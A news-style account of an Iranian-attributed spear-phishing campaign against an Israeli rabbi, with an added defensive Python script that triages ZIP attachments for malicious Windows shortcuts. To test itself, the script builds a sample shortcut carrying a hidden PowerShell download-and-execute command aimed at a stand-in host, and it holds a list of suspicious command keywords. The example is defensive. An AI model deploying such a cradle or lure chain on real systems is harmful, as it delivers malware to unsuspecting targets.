Amidst increasing tensions between Israel and Iran, a religious figure in Israel, a rabbi, was recently targeted by a known Iranian threat actor notorious for elaborate spear-phishing campaigns. The attack involved an elaborate setup in which the attacker invited the rabbi to participate in a podcast discussing "Jewish life in the Muslim world."
Researchers from Proofpoint identified this latest campaign and attributed it to the group tracked under various aliases, including TA453, APT42, Charming Kitten, Yellow Garuda, and ITG18. The threat actors employed a new malware toolkit named BlackSmith, which delivers a PowerShell trojan known as AnvilEcho, according to Cyber News.
On July 22, 2024, the attackers sent a seemingly innocuous email to the rabbi, masquerading as a podcast host and research director for the Institute for the Study of War (ISW). The hackers' MO was to build the rabbi's trust over a series of email exchanges. Early on, they set up a deceptive website on the look-alike domain understandingthewar[.]org (the genuine ISW site is understandingwar.org) to bolster their credibility. The real objective, however, was to get the rabbi to click a malicious link.
According to Proofpoint's report, once the target responded, TA453 sent a password-protected DocSend URL (DocSend is a document-sharing service). The link led to a text file containing a URL to the genuine ISW podcast the attackers were impersonating. This step was designed to normalize clicking links and entering passwords, conditioning the target for the actual malware delivery.
In subsequent interactions, the hackers sent a Google Drive URL leading to a ZIP file named "Podcast Plan-2024.zip." The archive contained a Windows shortcut (LNK) file named "Podcast Plan 2024.lnk," disguised behind a decoy PDF. Opening the LNK deployed the BlackSmith toolset, which in turn loaded the AnvilEcho PowerShell trojan.
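The ZIP-to-LNK-to-PowerShell chain described above is the part of this campaign a responder can check mechanically. As an added example (this is not Proofpoint's analysis code and not any TA453 artifact), the following Python scans a ZIP attachment for shortcut files and pulls out the command line each one would run, using the MS-SHLLINK header and StringData layout. The sample archive, the shortcut, the decoy PDF bytes and the example.invalid staging URL are all constructed here for the demonstration; the indicator list is a generic starting point for triage, not a signature for this campaign.

```python
"""Triage a ZIP lure: list .lnk entries and the command line each would execute.

Added example, not code from the page, Proofpoint, or the threat actor.
The archive and shortcut are constructed inline so the script runs offline.
"""
import io
import struct
import zipfile

# LinkFlags bits from the Shell Link Binary File Format (MS-SHLLINK, section 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Generic strings worth a second look in a shortcut's command line (assumption, not a campaign signature)
SUSPICIOUS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
              "rundll32", "-enc", "iex", "downloadstring", "hidden")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link (name, relative_path, working_dir, arguments, icon_location)."""
    if (len(data) < HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (u16) + item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        pos += width * count
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return fields   # ExtraData blocks that may follow are ignored for triage


def triage_zip(zip_bytes: bytes) -> list:
    """Describe every .lnk inside the archive: entry name, reconstructed command, matched indicators."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            fields = parse_lnk(zf.read(info))
            cmd = f"{fields.get('relative_path', '')} {fields.get('arguments', '')}".strip()
            hits = [k for k in SUSPICIOUS if k in cmd.lower()]
            findings.append({"entry": info.filename, "command": cmd, "indicators": hits})
    return findings


def build_lnk(relative_path: str, arguments: str, icon_location: str = None) -> bytes:
    """Build a minimal Unicode .lnk carrying only StringData (constructed sample for the demo)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS
    if icon_location is not None:
        flags |= HAS_ICON_LOCATION
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))   # attributes, timestamps, etc. left zero

    def s(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = s(relative_path) + s(arguments)
    if icon_location is not None:
        body += s(icon_location)
    return header + body


def build_sample_zip() -> bytes:
    """Constructed lure in the shape the text describes: decoy PDF plus a PowerShell-launching shortcut."""
    args = ('-nop -w hidden -ep bypass -c "Start-Process \'.\\Podcast Plan 2024.pdf\'; '
            "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage')\"")
    lnk = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    args, r"C:\Windows\System32\shell32.dll")   # icon borrowed so it looks like a document
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Podcast Plan 2024.pdf", b"%PDF-1.4\n% decoy, constructed\n")
        zf.writestr("Podcast Plan 2024.lnk", lnk)
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_zip(build_sample_zip()):
        print(f["entry"], "->", f["command"], "| indicators:", f["indicators"])
```

Point `triage_zip` at the bytes of a real attachment to use it outside the demo. Two caveats: real-world shortcuts often carry an ItemIDList and LinkInfo before the StringData, which the parser skips by size, and attackers sometimes pad the argument string with long runs of whitespace so the Properties dialog appears empty, so inspect the full extracted `command` rather than only the indicator list.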
Proofpoint researchers observed that TA453 attempts to evade detection by complicating the infection chain and combining multiple malicious functions into a single PowerShell script. The malware is tailored for intelligence collection and data exfiltration, often utilizing legitimate services like Dropbox for these activities.
It is important to be aware of the sophisticated ways Iranian hackers target Israelis and to take precautions. In particular, an emailed archive that contains a Windows shortcut (.lnk) should be treated as hostile until proven otherwise, however long and friendly the preceding correspondence has been.